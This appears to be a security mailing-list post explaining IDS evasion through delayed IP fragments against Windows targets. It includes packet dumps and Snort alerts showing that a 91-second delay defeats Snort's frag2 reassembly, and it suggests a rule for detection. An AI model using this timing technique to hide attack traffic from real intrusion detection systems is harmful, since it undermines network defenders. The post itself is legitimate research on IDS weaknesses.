<pre> There seems to be some confusion about the fragmentation IDS evasion. We've observed fragmentation timeouts on windows from 5 seconds to 90 seconds depending on the software installed and random chance. Here are raw dumps from an evasion. The mistake Judy Novak made in her analysis was in not recalculating the delay between the first fragment and the other two fragments. If it is too short the target will reassemble the first two fragments and find an invalid checksum discarding the packet. No ICMP response will be sent. Some experimentation will have to be done to find the correct timeout. It can be done remotely by increasing the time between two good fragments until a reply isn't sent. (Windows boxes don't seem to send out a frag time exceeded on anything other than the first fragment.) Here's a packet dump to verify that Snort's frag2 preprocessor is working: 16:04:18.155735 IP (tos 0x0, ttl 64, id 15537, offset 0, flags [+], proto: ICMP (1), length: 28) 10.4.4.217 > 10.4.4.252: ICMP echo request, id 33334, seq 83, length 8 0x0000: 0011 2f7e db0b 000d 93b4 d31a 0800 4500 ../~..........E. 0x0010: 001c 3cb1 2000 4001 0054 0a04 04d9 0a04 ..<...@..T...... 0x0020: 04fc 0800 5446 8236 0053 5555 5555 5555 ....TF.6.SUUUUUU 0x0030: 5555 5555 5555 5555 5555 5555 UUUUUUUUUUUU 16:04:18.178271 IP (tos 0x0, ttl 64, id 15537, offset 8, flags [none], proto: ICMP (1), length: 28) 10.4.4.217 > 10.4.4.252: icmp 0x0000: 0011 2f7e db0b 000d 93b4 d31a 0800 4500 ../~..........E. 0x0010: 001c 3cb1 0001 4001 2053 0a04 04d9 0a04 ..<...@..S...... 0x0020: 04fc 4241 4453 5455 4646 5555 5555 5555 ..BADSTUFFUUUUUU 0x0030: 5555 5555 5555 5555 5555 5555 UUUUUUUUUUUU 16:04:18.178325 IP (tos 0x0, ttl 128, id 57573, offset 0, flags [none], proto: ICMP (1), length: 36) 10.4.4.252 > 10.4.4.217: ICMP echo reply, id 33334, seq 83, length 16 0x0000: 000d 93b4 d31a 0011 2f7e db0b 0800 4500 ......../~....E. 0x0010: 0024 e0e5 0000 8001 3c17 0a04 04fc 0a04 .$......<....... 0x0020: 04d9 0000 5c46 8236 0053 4241 4453 5455 ....\F.6.SBADSTU 0x0030: 4646 0000 0000 0000 0000 0000 FF.......... [**] [1:384:5] Found BadStuff [**] [Classification: Misc activity] [Priority: 3] 02/02-16:04:18.178271 10.4.4.217 -> 10.4.4.252 ICMP TTL:64 TOS:0x0 ID:15537 IpLen:20 DgmLen:36 Type:8 Code:0 ID:33334 Seq:83 ECHO [**] [1:384:5] Found Generic ICMP Packet [**] [Classification: Misc activity] [Priority: 3] 02/02-16:04:18.178271 10.4.4.217 -> 10.4.4.252 ICMP TTL:64 TOS:0x0 ID:15537 IpLen:20 DgmLen:36 Type:8 Code:0 ID:33334 Seq:83 ECHO With no delay snort properly reassembles the fragments and generates an alert. With a delay, the target doesn't reassemble, but Snort still generates an alert. 16:01:33.951416 IP (tos 0x0, ttl 64, id 12524, offset 0, flags [+], proto: ICMP (1), length: 28) 10.4.4.217 > 10.4.4.252: ICMP echo request, id 33334, seq 83, length 8 0x0000: 0011 2f7e db0b 000d 93b4 d31a 0800 4500 ../~..........E. 0x0010: 001c 30ec 2000 4001 0c19 0a04 04d9 0a04 ..0...@......... 0x0020: 04fc 0800 5446 8236 0053 5555 5555 5555 ....TF.6.SUUUUUU 0x0030: 5555 5555 5555 5555 5555 5555 UUUUUUUUUUUU 16:02:38.281468 IP (tos 0x0, ttl 128, id 57570, offset 0, flags [none], proto: ICMP (1), length: 56) 10.4.4.252 > 10.4.4.217: ICMP ip reassembly time exceeded, length 36 IP (tos 0x0, ttl 64, id 12524, offset 0, flags [+], proto: ICMP (1), length: 28) 10.4.4.217 > 10.4.4.252: ICMP echo request, id 33334, seq 83, length 8 0x0000: 000d 93b4 d31a 0011 2f7e db0b 0800 4500 ......../~....E. 0x0010: 0038 e0e2 0000 8001 3c06 0a04 04fc 0a04 .8......<....... 0x0020: 04d9 0b01 162f 0000 0000 4500 001c 30ec ...../....E...0. 0x0030: 2000 4001 0c19 0a04 04d9 0a04 04fc 0800 ..@............. 0x0040: 5446 8236 0053 TF.6.S 16:03:04.977353 IP (tos 0x0, ttl 64, id 12524, offset 8, flags [none], proto: ICMP (1), length: 28) 10.4.4.217 > 10.4.4.252: icmp 0x0000: 0011 2f7e db0b 000d 93b4 d31a 0800 4500 ../~..........E. 0x0010: 001c 30ec 0001 4001 2c18 0a04 04d9 0a04 ..0...@.,....... 0x0020: 04fc 4241 4453 5455 4646 5555 5555 5555 ..BADSTUFFUUUUUU 0x0030: 5555 5555 5555 5555 5555 5555 UUUUUUUUUUUU [**] [1:384:5] Found BadStuff [**] [Classification: Misc activity] [Priority: 3] 02/02-16:03:04.977353 10.4.4.217 -> 10.4.4.252 ICMP TTL:64 TOS:0x0 ID:12524 IpLen:20 DgmLen:36 Type:8 Code:0 ID:33334 Seq:83 ECHO [**] [1:384:5] Found Generic ICMP Packet [**] [Classification: Misc activity] [Priority: 3] 02/02-16:03:04.977353 10.4.4.217 -> 10.4.4.252 ICMP TTL:64 TOS:0x0 ID:12524 IpLen:20 DgmLen:36 Type:8 Code:0 ID:33334 Seq:83 ECHO With a delay of 91 seconds, the IDS evasion works and we get back a properly reassembled ICMP reply. 15:57:17.846828 IP (tos 0x0, ttl 64, id 12603, offset 8, flags [none], proto: ICMP (1), length: 28) 10.4.4.217 > 10.4.4.252: icmp 0x0000: 0011 2f7e db0b 000d 93b4 d31a 0800 4500 ../~..........E. 0x0010: 001c 313b 0001 4001 2bc9 0a04 04d9 0a04 ..1;..@.+....... 0x0020: 04fc 474f 4453 5455 4646 5555 5555 5555 ..GODSTUFFUUUUUU 0x0030: 5555 5555 5555 5555 5555 5555 UUUUUUUUUUUU 15:58:48.873073 IP (tos 0x0, ttl 64, id 12603, offset 0, flags [+], proto: ICMP (1), length: 28) 10.4.4.217 > 10.4.4.252: ICMP echo request, id 33334, seq 83, length 8 0x0000: 0011 2f7e db0b 000d 93b4 d31a 0800 4500 ../~..........E. 0x0010: 001c 313b 2000 4001 0bca 0a04 04d9 0a04 ..1;..@......... 0x0020: 04fc 0800 5446 8236 0053 5555 5555 5555 ....TF.6.SUUUUUU 0x0030: 5555 5555 5555 5555 5555 5555 UUUUUUUUUUUU 15:58:48.892586 IP (tos 0x0, ttl 64, id 12603, offset 8, flags [none], proto: ICMP (1), length: 28) 10.4.4.217 > 10.4.4.252: icmp 0x0000: 0011 2f7e db0b 000d 93b4 d31a 0800 4500 ../~..........E. 0x0010: 001c 313b 0001 4001 2bc9 0a04 04d9 0a04 ..1;..@.+....... 0x0020: 04fc 4241 4453 5455 4646 5555 5555 5555 ..BADSTUFFUUUUUU 0x0030: 5555 5555 5555 5555 5555 5555 UUUUUUUUUUUU 15:58:48.892644 IP (tos 0x0, ttl 128, id 57559, offset 0, flags [none], proto: ICMP (1), length: 36) 10.4.4.252 > 10.4.4.217: ICMP echo reply, id 33334, seq 83, length 16 0x0000: 000d 93b4 d31a 0011 2f7e db0b 0800 4500 ......../~....E. 0x0010: 0024 e0d7 0000 8001 3c25 0a04 04fc 0a04 .$......<%...... 0x0020: 04d9 0000 5c46 8236 0053 4241 4453 5455 ....\F.6.SBADSTU 0x0030: 4646 0000 0000 0000 0000 0000 FF.......... There were no snort alerts. We haven't tried frag3, but fragments generally aren't delayed in the wild so an alert on all fragments more than a second apart would probably be effective. Jason Larsen Mike Milvich </pre>
